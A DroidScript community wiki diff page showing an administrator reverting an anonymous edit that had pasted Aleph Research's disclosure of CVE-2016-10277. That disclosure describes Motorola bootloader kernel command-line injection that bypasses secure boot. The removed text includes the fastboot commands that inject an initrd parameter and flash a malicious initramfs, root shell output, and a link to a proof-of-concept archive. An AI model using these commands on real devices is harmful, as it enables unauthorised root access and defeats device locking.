DroidScript wiki

(was AndroidScript) unofficial documentation by the community

User Tools

Site Tools


built_in:start

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revision Previous revision
built_in:start [2018/12/30 13:41]
182.1.63.175 [Built-in features - DroidScript API]
built_in:start [2018/12/30 17:07] (current)
administrator old revision restored (2018/12/30 05:23)
Line 1: Line 1:
-Sources: +======Built-in features - DroidScript API====== ​
-https://​alephsecurity.com/​2017/​08/​30/​untethered-initroot/ +
-https://​github.com/​alephsecurity/​initroot+
  
-initroot: Motorola Bootloader Kernel Cmdline Injection Secure Boot & Device Locking Bypass (CVE-2016-10277) 
  
-By Roee Hay / Aleph Research, HCL Technologies 
- 
-Recap of the Vulnerability and the Tethered-jailbreak 
- 
-1. Vulnerable versions of the Motorola Android Bootloader (ABOOT) allow for kernel command-line injection. 
-2. Using a proprietary fastboot OEM command, only available in the Motorola ABOOT, we can inject, through USB, a parameter named initrd which allows us to force the Linux kernel to populate initramfs into rootfs from a specified physical address. 
-3. We can abuse the ABOOT download functionality in order to place our own malicious initramfs at a known physical address, named SCRATCH_ADDR (see here for a list of devices). 
-4. Exploiting the vulnerability allows the adversary to gain unconfined root shell. 
-5. Since the initramfs payload is injected into RAM by the adversary, the vulnerability must be re-exploited on every reboot. 
-For example, here is a successful run of the exploit on cedric (Moto G5) 
- 
-$ fastboot oem config fsg-id "a initrd=0xA2100000,​1588598" ​ 
-$ fastboot flash aleph initroot-cedric.cpio.gz ​ 
-$ fastboot continue 
- 
-$ adb shell  
-cedric:/ # id 
-uid=0(root) gid=0(root) groups=0(root),​1004(input),​1007(log),​1011(adb),​1015(sdcard_rw),​1028(sdcard_r),​3001(net_bt_admin),​3002(net_bt),​3003(inet),​3006(net_bw_stats),​3014(readproc) context=u:​r:​kernel:​s0 
-cedric:/ # getenforce 
-Permissive 
-cedric:/ # 
- 
- 
-Proof of Concept: 
-https://​github.com/​offensive-security/​exploitdb-bin-sploits/​raw/​master/​bin-sploits/​42601.zip 
- 
-            ​ 
 ====Links==== ====Links====
 ^App and Layout^ ^App and Layout^
built_in/start.txt · Last modified: 2018/12/30 17:07 by administrator